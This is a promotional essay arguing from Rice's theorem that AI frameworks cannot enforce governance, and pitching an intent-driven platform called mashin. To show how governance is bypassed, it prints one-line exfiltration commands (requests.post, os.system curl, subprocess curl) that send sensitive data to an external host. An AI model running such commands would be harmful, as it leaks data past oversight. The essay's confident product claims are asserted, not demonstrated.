The Right Level of Abstraction — Structured Thoughts

Why AI governance verification is provably undecidable, and provably structural, depending on where you stand

“A change in perspective is worth 80 IQ points.” Alan Kay said that in 1982. He was talking about programming language design, but the insight applies anywhere a field gets stuck.

The AI governance industry is stuck.

I sensed this before I could name it. I’d been interested in building systems that could reason about themselves since high school. When LLMs opened the door, I dove in, helped friends build intelligent systems, and used every framework the ecosystem offered. And I spent 95% of my time on plumbing, not intelligence. The systems I built couldn’t be handed over. The people who understood their domains couldn’t own what I’d created for them. I was delivering consulting engagements, not software. The problem was structural, and it took a 1953 theorem to tell me why.

Billions of dollars. Hundreds of startups. A $492M market that Gartner projects will double by 2030. Enterprise teams building policy dashboards, compliance checklists, monitoring overlays, bias detectors, guardrail frameworks. An entire category of venture-funded companies whose pitch decks all say the same thing: “We make AI safe.”

None of them can. Not because they lack talent or funding. Because they’re solving the problem at the wrong level of abstraction.

The three levels

Look at the AI workflow landscape and you’ll find tools clustered at two levels, with a gap in between.

Level one: code frameworks. LangChain, CrewAI, AutoGen, Semantic Kernel. You write Python or TypeScript. You get maximum flexibility. You can call any API, import any library, execute arbitrary logic. These frameworks are productive. Engineers love them. They’re also ungovernable, for reasons that are mathematical, not practical.

Level two: no-code builders. n8n, Zapier, Make, Flowise. You drag boxes and connect lines. The platforms are safe because the vocabulary is restricted. You can only do what the builder exposes. But that restriction cuts both ways. The moment your workflow needs something the builder didn’t anticipate, you’re stuck. Or you drop down to a code node, and you’re back at level one.

The industry treats this as a tradeoff. More expressiveness means less governance. More governance means less expressiveness. Pick your position on the spectrum.

It isn’t a spectrum. It’s a false dichotomy created by operating at the wrong abstraction level. There’s a third level where you get both.

Rice’s theorem

In 1953, Henry Gordon Rice proved a theorem that should be on the wall of every AI governance company’s office. It says: no algorithm can decide any non-trivial semantic property of programs in a Turing-complete language.

Let that settle for a moment.

A “semantic property” is a property of what a program does, not of how its source text is written; it is “non-trivial” if some programs have it and others don’t. “This program always routes its API calls through an audit layer.” “This program never sends data to an external server without approval.” “This program’s effects are fully governed.”

Rice proved you cannot build a checker that, for every program, correctly decides whether it satisfies such a property. Not “it’s hard.” Not “it requires more compute.” Impossible. Provably, mathematically, permanently impossible. The proof is a straightforward reduction from the halting problem.
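The reduction is short enough to sketch. The Python below illustrates the standard argument rather than proving it, and every name in it (`build_gadget`, `raw_send`, and the impossible checker `is_always_audited`) is hypothetical. Given any program `p`, the gadget runs `p` and then makes one unaudited send, so it violates “every send is audited” exactly when `p` halts.

```python
from typing import Callable

Program = Callable[[], None]


def build_gadget(p: Program, send_unaudited: Callable[[], None]) -> Program:
    """Build a program that breaks 'every send is audited' exactly when p halts."""

    def gadget() -> None:
        p()               # may never return; if so, the send below never runs
        send_unaudited()  # reached only if p() halts

    return gadget


# Suppose a perfect checker is_always_audited(program) -> bool existed
# (hypothetical; Rice's theorem says it cannot). It would decide halting:
#
#     def halts(p: Program) -> bool:
#         return not is_always_audited(build_gadget(p, raw_send))
#
# where raw_send is any send that bypasses the audit layer. Turing showed
# no halts() can exist, so no is_always_audited() can exist either.

if __name__ == "__main__":
    sent: list[str] = []
    build_gadget(lambda: None, lambda: sent.append("unaudited"))()
    print(sent)  # prints ['unaudited']: a halting p reaches the unaudited send
```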

Here’s what this means for AI governance. Every framework that gives you a general-purpose language (Python, TypeScript, whatever) and then tries to ensure governance over what that code does is attempting something Rice proved cannot be done. The guardrails, the callbacks, the permission systems, the audit wrappers: they are convention. They work when every developer, every plugin, every AI-generated code snippet voluntarily cooperates. They fail the moment anything doesn’t.

And in a Turing-complete language, there is always a way to not cooperate.

```python
# Every AI framework's governance, bypassed:
import requests

requests.post("https://external.com", json=sensitive_data)
```

One line, plus an import of requests, the most widely used Python HTTP library. No special privileges. The audit layer doesn’t see it. The governance callbacks don’t fire. The permission system doesn’t know it happened. The code produced a side effect that the framework’s governance architecture had no mechanism to prevent, because Rice’s theorem says no such mechanism can exist for arbitrary programs.
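A toy model makes the “convention” point concrete. None of this is LangChain’s or CrewAI’s real API: `audited`, `governed_send`, and `raw_send` are hypothetical, and `raw_send` appends to an in-memory `outbox` in place of a real network call. The wrapper sees only the calls that choose to go through it.

```python
from typing import Any, Callable

audit_log: list[str] = []            # what the governance layer sees
outbox: list[tuple[str, str]] = []   # what actually left the process


def raw_send(url: str, body: str) -> None:
    """Stand-in for requests.post: the effect happens as soon as it is called."""
    outbox.append((url, body))


def audited(fn: Callable[..., Any]) -> Callable[..., Any]:
    """Framework-style wrapper: log the call, then perform it."""

    def wrapper(*args: Any, **kwargs: Any) -> Any:
        audit_log.append(f"{fn.__name__}{args}")
        return fn(*args, **kwargs)

    return wrapper


governed_send = audited(raw_send)


def user_code() -> None:
    governed_send("https://partner.example", "weekly report")  # cooperates
    raw_send("https://external.example", "customer records")   # does not


if __name__ == "__main__":
    user_code()
    print(len(outbox), len(audit_log))  # prints 2 1: two effects, one audit entry
```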

This is not a bug in LangChain or CrewAI. It is a property of every system that tries to govern Turing-complete code from the outside. The impossibility is inherent in the computational model.

The fix is well understood in mathematics. When you need to prove things about a system, you choose a system where those things are provable. You don’t insist on using a system too powerful for your proofs and then complain that proving things is hard.

The same fix applies to governance.

The intent-driven insight

What if programs didn’t produce effects? What if they produced intents?

In every framework at level one and level two, when code says “send this email” or “call this API,” the action happens immediately. The program is the effect. There is no moment between deciding and doing. Governance has to catch effects in flight, and for arbitrary code, Rice proved there is no reliable way to know in advance which effects will occur.

But intents are different. An intent is a data structure: “I want to send this email, to this person, with this content.” It describes what should happen. It doesn’t make it happen. The gap between the intent and the effect is where governance lives. Put simply: governance is a property of the translation layer between what the program wants and what actually happens. No translation layer, no governance. Create the translation layer, and governance becomes a natural property of the system.
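Here is a minimal sketch of that translation layer under deliberately simple assumptions: an intent is an immutable record, a policy is a function that approves or denies it, and only the interpreter holds the functions that touch the outside world. `Intent`, `interpret`, and the policy shape are names invented for illustration, not the API of any particular platform, and `send_email` is a stub that appends to a list.

```python
from dataclasses import dataclass
from typing import Callable, Optional


@dataclass(frozen=True)
class Intent:
    """A description of an effect. Creating one does nothing by itself."""
    action: str   # e.g. "send_email"
    target: str   # e.g. a recipient address
    payload: str


Policy = Callable[[Intent], bool]
Effector = Callable[[Intent], str]
Ledger = list[tuple[Intent, str]]


def interpret(intent: Intent, policy: Policy,
              effectors: dict[str, Effector], ledger: Ledger) -> Optional[str]:
    """The gap between intent and effect: record, check, then maybe act."""
    approved = policy(intent)
    ledger.append((intent, "approved" if approved else "denied"))
    if not approved:
        return None
    return effectors[intent.action](intent)  # the only place effects happen


def program() -> list[Intent]:
    """A 'program' in this model can only describe what it wants."""
    return [
        Intent("send_email", "ana@example.com", "Q3 summary"),
        Intent("send_email", "someone@elsewhere.test", "Q3 summary"),
    ]


if __name__ == "__main__":
    outbox: list[Intent] = []

    def send_email(i: Intent) -> str:
        outbox.append(i)  # stand-in for a real mail client
        return f"sent to {i.target}"

    def internal_only(i: Intent) -> bool:
        return i.target.endswith("@example.com")

    ledger: Ledger = []
    results = [interpret(i, internal_only, {"send_email": send_email}, ledger)
               for i in program()]
    print(results)      # ['sent to ana@example.com', None]
    print(len(ledger))  # 2: the denied intent is recorded too
```

The denied intent still lands in the ledger: because the intent exists as data before any effect, recording it costs nothing extra.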

mashin is built on this insight. Programs produce intents (we call them directives). Every action, every API call, every model invocation, every external interaction is an intent first, passed to a governance interpreter, and an effect only if governance approves. The program says what it wants. The platform decides whether it happens.

The language has five step types. Each one reflects a kind of cognitive intent:

:compute for pure computation. No I/O by construction. The capability is absent, not blocked. The code computes a result from its inputs and returns it. That’s all it can do.

:reason for inference. The intent is “I need to think about this.” The platform mediates every model call: which model, what prompt, what response. Every inference is recorded, metered, auditable.

:remember for semantic storage. The intent is “I need to store or recall this.” Reads and writes to the knowledge layer go through the platform.

:call for invoking other machines. The intent is “I need another machine to handle this.” Inter-machine communication follows defined interfaces.

:decide for control flow. Pure. No effects, just routing. The intent is “given this, what’s next?”
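The split between pure steps and intent steps can be modeled in a few lines of Python. This is a hypothetical sketch, not mashin’s syntax or runtime: `StepType`, `run_step`, and the `platform` callback are assumptions. Python cannot make a capability truly absent (a step body could still import a network library), so the model shows only the shape: :compute and :decide bodies are never handed the platform, while :reason, :remember, and :call bodies can only describe a request that the platform fulfils, records, or refuses.

```python
from enum import Enum
from typing import Any, Callable

State = dict[str, Any]


class StepType(Enum):
    COMPUTE = "compute"    # pure: data in, data out
    REASON = "reason"      # intent: "I need to think about this"
    REMEMBER = "remember"  # intent: "I need to store or recall this"
    CALL = "call"          # intent: "I need another machine to handle this"
    DECIDE = "decide"      # pure: data in, name of the next step out


# Step types whose result is a request the platform must fulfil.
INTENT_TYPES = frozenset({StepType.REASON, StepType.REMEMBER, StepType.CALL})

Platform = Callable[[StepType, Any], Any]


def run_step(step_type: StepType, body: Callable[[State], Any],
             state: State, platform: Platform) -> Any:
    """Evaluate one step. Pure steps never see `platform`; intent steps
    only describe a request, and the platform decides what happens."""
    if step_type in INTENT_TYPES:
        request = body(state)                # what the step wants
        return platform(step_type, request)  # mediated, recorded, maybe refused
    return body(state)                       # :compute / :decide


if __name__ == "__main__":
    seen: list[tuple[StepType, Any]] = []

    def platform(kind: StepType, request: Any) -> Any:
        seen.append((kind, request))  # every intent is observed here
        return "stub model answer"

    state: State = {"ticket": "Printer on fire"}
    summary = run_step(StepType.REASON,
                       lambda s: f"Summarize: {s['ticket']}", state, platform)
    route = run_step(StepType.DECIDE,
                     lambda s: "escalate" if "fire" in s["ticket"] else "queue",
                     state, platform)
    print(summary, route, len(seen))  # stub model answer escalate 1
```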

These five types are not a simplification. They’re not “training wheels” or “guardrails” or a “subset of what you can do in Python.” They’re a change in abstraction level. Programs at this level produce structured intents, not arbitrary effects. And at this level, six things change at once.

Governance is free. Not “easier.” Free. Every step that reaches outside the machine produces an intent, and every intent passes through the governance interpreter. There is no escape hatch, no raw I/O primitive, no way to import requests and fire off an HTTP call. The vocabulary doesn’t include ungoverned effects. Rice’s theorem stops being an obstacle because the semantic property “all effects are governed” holds structurally for every program in the language. That makes it a trivial property in Rice’s sense, and a trivial property is decidable: the checker simply answers yes. To be clear: the platform is fully Turing-complete. You can compute anything. What you can’t do is produce an effect without expressing the intent first. The constraint is on how effects enter the world, not on what you can compute. That’s the distinction Rice’s theorem actually draws: it’s about semantic properties of arbitrary programs, not about computational power. mashin preserves the power and constrains the effects.

AI generation is tractable. Five intent types with well-defined interfaces, not the unbounded space of possible Python programs. The vocabulary a generator chooses from is small and finite, and so are the kinds of structural mistakes it can make. Generation becomes a constrained, checkable problem instead of an open-ended one.

Human intent maps directly. “Get the data, think about it, decide what to do, take action.” That maps one-to-one onto :remember, :reason, :decide, :call. The gap between what a person means and what the program says collapses to nearly zero. Programs read like plans because they are plans: structured descriptions of cognitive intent.

Intelligibility is inherent. Anyone can read a machine definition and understand what it does: a new engineer, an auditor, a regulator. Not because the code is well-commented. Because five intent types, named steps, and explicit data flow make the machine its own documentation.

Audit trails are automatic. In an intent-driven architecture, every action is a data structure before it’s an effect. Recording it in an append-only ledger is trivial, not a separate infrastructure concern. The audit trail is a natural consequence of the architecture, not a feature you build.

Composition works. If a machine only contains :compute and :decide steps, it produces no intents that reach outside. If it calls another machine via :call, you know exactly which machine and what its interface is. The composition of two governed machines is a governed machine. You can verify the whole by verifying the parts.
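Compositional checking can be sketched as a recursive walk over machine definitions. The model is hypothetical: a machine is a list of `(step_type, target)` pairs, `@mashin/actions/http/get` (named later in this article) is treated as a platform-provided leaf that performs an `http.get` effect, and `outward_intents` is an invented helper. A machine’s outward surface is its own :reason and :remember intents plus the surfaces of everything it calls.

```python
from typing import Mapping, Sequence

# Hypothetical model: a machine is a list of (step_type, target) pairs.
# `target` matters only for "call" steps, where it names another machine.
Machine = Sequence[tuple[str, str]]

# Platform-provided effect machines and the kind of effect each performs.
# The http name comes from the article; this mapping is an assumption.
EFFECT_MACHINES: Mapping[str, str] = {"@mashin/actions/http/get": "http.get"}


def outward_intents(name: str, machines: Mapping[str, Machine],
                    _visiting: frozenset = frozenset()) -> frozenset:
    """Every kind of outward-facing intent `name` can produce, including
    those of the machines it calls. The whole is the union of the parts."""
    if name in EFFECT_MACHINES:
        return frozenset({EFFECT_MACHINES[name]})
    if name in _visiting:  # recursive call: already being counted higher up
        return frozenset()
    found: set = set()
    for step_type, target in machines[name]:
        if step_type in ("reason", "remember"):
            found.add(step_type)
        elif step_type == "call":
            found |= outward_intents(target, machines, _visiting | {name})
        # "compute" and "decide" contribute nothing: they are pure
    return frozenset(found)


if __name__ == "__main__":
    machines = {
        "score": [("compute", ""), ("decide", "")],
        "summarize": [("compute", ""), ("reason", "")],
        "fetch_and_summarize": [("call", "@mashin/actions/http/get"),
                                ("call", "summarize"), ("call", "score")],
    }
    print(sorted(outward_intents("score", machines)))                # []
    print(sorted(outward_intents("fetch_and_summarize", machines)))  # ['http.get', 'reason']
```

A machine built only from :compute and :decide steps comes back with an empty surface, and a composed machine’s surface is exactly the union of its parts’ surfaces.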

These aren’t six separate features. They’re six consequences of one decision: building an intent-driven architecture at the right level of abstraction. The problems don’t get solved independently. They collapse together. You don’t get governance and then, separately, work on audit trails and then, separately, work on AI generation. You make programs produce intents instead of effects, and all six fall out for free.

The one-line test

Here’s a way to evaluate any AI workflow platform. Open the development environment. Try to write one line that sends data to an external server without the platform knowing.

In LangChain: requests.post(url, data=payload). Works.

In CrewAI: os.system("curl https://external.com"). Works.

In AutoGen: subprocess.run(["curl", url]). Works.

In an intent-driven language: that line doesn’t exist. Not because it’s blocked by a linter. Not because a reviewer would catch it. Not because a runtime check would flag it. The vocabulary of the language doesn’t include it. There is no function, no primitive, no escape hatch that produces an ungoverned effect. Every external action is an intent, and every intent goes through governance.

The problem didn’t get solved. It stopped existing.

This is the operational meaning of “the right level of abstraction.” At the code level, governance bypass is a single line of Python. At the intent level, governance bypass is a category error, like asking what’s north of the North Pole. The question doesn’t parse.
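A toy parser shows what “doesn’t parse” means in practice. It assumes a hypothetical definition format (a list of dicts with `name` and `type`); `parse` and `NotAProgram` are invented names, and mashin’s real front end, which compiles to BEAM, is not shown. A step that tries to post data directly has no step type to be written in, so the definition is rejected before anything runs, and every definition the parser accepts satisfies “all effects go through the platform” by construction.

```python
from typing import Any

VOCABULARY = frozenset({"compute", "reason", "remember", "call", "decide"})


class NotAProgram(ValueError):
    """Raised when a definition uses a step type outside the vocabulary."""


def parse(definition: list[dict[str, Any]]) -> list[tuple[str, str]]:
    """Turn a definition into (name, step_type) pairs, or reject it."""
    steps = []
    for index, step in enumerate(definition):
        step_type = step.get("type")
        if step_type not in VOCABULARY:
            raise NotAProgram(f"step {index}: no step type {step_type!r}")
        steps.append((step["name"], step_type))
    return steps


if __name__ == "__main__":
    ok = [{"name": "draft", "type": "reason"}, {"name": "route", "type": "decide"}]
    print(parse(ok))  # [('draft', 'reason'), ('route', 'decide')]
    bypass = [{"name": "leak", "type": "http_post"}]  # there is no such step type
    try:
        parse(bypass)
    except NotAProgram as err:
        print(err)  # step 0: no step type 'http_post'
```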

The false tradeoff

The obvious objection: “But you’ve given up expressiveness. What if I need to do something your five step types don’t support?”

This confuses expressiveness with escape velocity. The five intent types are a compositional vocabulary. :compute steps are pure computation: no I/O by construction. When a workflow needs Python, JavaScript, or Rust, it expresses that intent via :call to a governed effect machine. Computation is fully expressive. What it can’t do is produce ungoverned effects. It can’t send an email, call an API, or write to a database without expressing the intent through governance first.

Effects happen through machines. An HTTP request goes through @mashin/actions/http/get. A database write goes through a governed data machine. An email send goes through a governed notification machine. Each of these effect machines has its own governance policy, its own audit trail, its own approval requirements. The intent is always visible before the effect occurs.
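The per-machine governance described above might look like this in a small model. `EffectMachine`, `dispatch`, and the `notify/email` name are hypothetical; `@mashin/actions/http/get` comes from the article, but its policy here is an invented example, and both `perform` functions are stubs that return strings instead of touching a network. Each machine carries its own policy, approval requirement, and audit trail, and the intent is recorded before any effect runs.

```python
from dataclasses import dataclass, field
from typing import Any, Callable, Optional

Request = dict[str, Any]


@dataclass
class EffectMachine:
    """A governed gateway for one kind of effect (hypothetical model)."""
    perform: Callable[[Request], str]  # the only code that touches the world
    policy: Callable[[Request], bool]  # this machine's own rules
    needs_approval: bool = False       # require a human sign-off?
    audit: list[tuple[Request, str]] = field(default_factory=list)


def dispatch(registry: dict[str, EffectMachine], name: str, request: Request,
             approve: Callable[[str, Request], bool]) -> Optional[str]:
    """Handle a :call intent aimed at an effect machine."""
    machine = registry[name]
    if not machine.policy(request):
        machine.audit.append((request, "denied by policy"))
        return None
    if machine.needs_approval and not approve(name, request):
        machine.audit.append((request, "rejected by approver"))
        return None
    machine.audit.append((request, "approved"))  # recorded before the effect
    return machine.perform(request)


if __name__ == "__main__":
    registry = {
        "@mashin/actions/http/get": EffectMachine(
            perform=lambda r: f"GET {r['url']} -> 200",  # stub, no real network
            policy=lambda r: r["url"].startswith("https://"),
        ),
        "notify/email": EffectMachine(  # hypothetical machine name
            perform=lambda r: f"emailed {r['to']}",
            policy=lambda r: True,
            needs_approval=True,
        ),
    }

    def never_approve(name: str, request: Request) -> bool:
        return False

    print(dispatch(registry, "@mashin/actions/http/get",
                   {"url": "https://example.com"}, never_approve))
    print(dispatch(registry, "notify/email", {"to": "cfo@example.com"}, never_approve))
    print(registry["notify/email"].audit)
```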

The expressiveness isn’t reduced. It’s restructured. You can express anything you could express in Python. You just express it as intent, which means governance, audit trails, and composition come free.

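The analogy to SQL is instructive but incomplete. Nobody complains that SQL “limits expressiveness” because you can’t write arbitrary C inside a query. The constraint is the point. SQL is expressive enough for data operations, and its restrictions are what make its guarantees possible: a declarative core that is not Turing-complete (setting aside recursive extensions) is what makes aggressive query optimization possible, and the fact that every query passes through the database engine is what makes access control and transaction isolation enforceable.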

mashin goes further. The platform is Turing-complete. You can express any algorithm, any computation, any logic you could write in Python or any other general-purpose language. What’s constrained is not what you can compute but how you can affect the world: every effect must be expressed as an intent. The expressiveness boundary and the governance boundary are coterminous: you get full computational power and full governance simultaneously, not one at the expense of the other. We proved this formally. SQL traded expressiveness for guarantees. mashin doesn’t have to.

Standing in the right place

Einstein, paraphrased: you can’t solve a problem from the same level of thinking that created it. The AI governance problem was created at the code level, where general-purpose languages give you infinite expressiveness and Rice’s theorem takes away your ability to prove anything about what that expressiveness does.

The answer isn’t better guardrails. It isn’t more callbacks. It isn’t fancier monitoring dashboards or larger compliance teams or smarter static analysis. All of those approaches accept the premise that governance must be achieved over arbitrary code. Rice proved that premise leads nowhere.

The answer is intent-driven architecture. Programs that produce intents instead of effects. A level of abstraction where governance isn’t a feature you add but a property you can’t remove.

This follows the pattern of every major advance in computing. Operating systems absorbed resource management. Databases absorbed transactional consistency. Distributed systems absorbed coordination. Each time, a class of problems that application developers solved repeatedly and badly was absorbed into the platform.

Governance of autonomous intelligent systems is the next instance.

A developer who builds on an intent-driven medium never writes governance code, the same way a developer who writes SQL never implements their own transaction isolation. The infrastructure overhead is zero, because governance is the architecture. Audit trails are free, because every intent is a data structure the governance interpreter records before acting on it. Trust progression is configurable, because every intent passes through a governance interpreter that can enforce whatever policy the deployment requires.

And the machines are not data structures parsed at runtime. They compile to BEAM bytecode, so intent-driven systems run as compiled code on the BEAM virtual machine rather than through a layer that re-interprets workflow definitions on every execution. Building governed systems becomes simpler, not harder, than building ungoverned ones.

Rice’s theorem applies to everyone building in this space. The wall is the same wall. General-purpose languages cannot structurally guarantee governance properties. Every team that tries will discover this, sooner or later.

mashin is already on the other side. 572 machine-checked Rocq theorems prove the formal properties. The playing field is defined.

Alan McCann is the creator of mashin, an intent-driven computing platform where AI workflows compile to a production VM with structural governance, formally verified by 572 machine-checked Rocq theorems.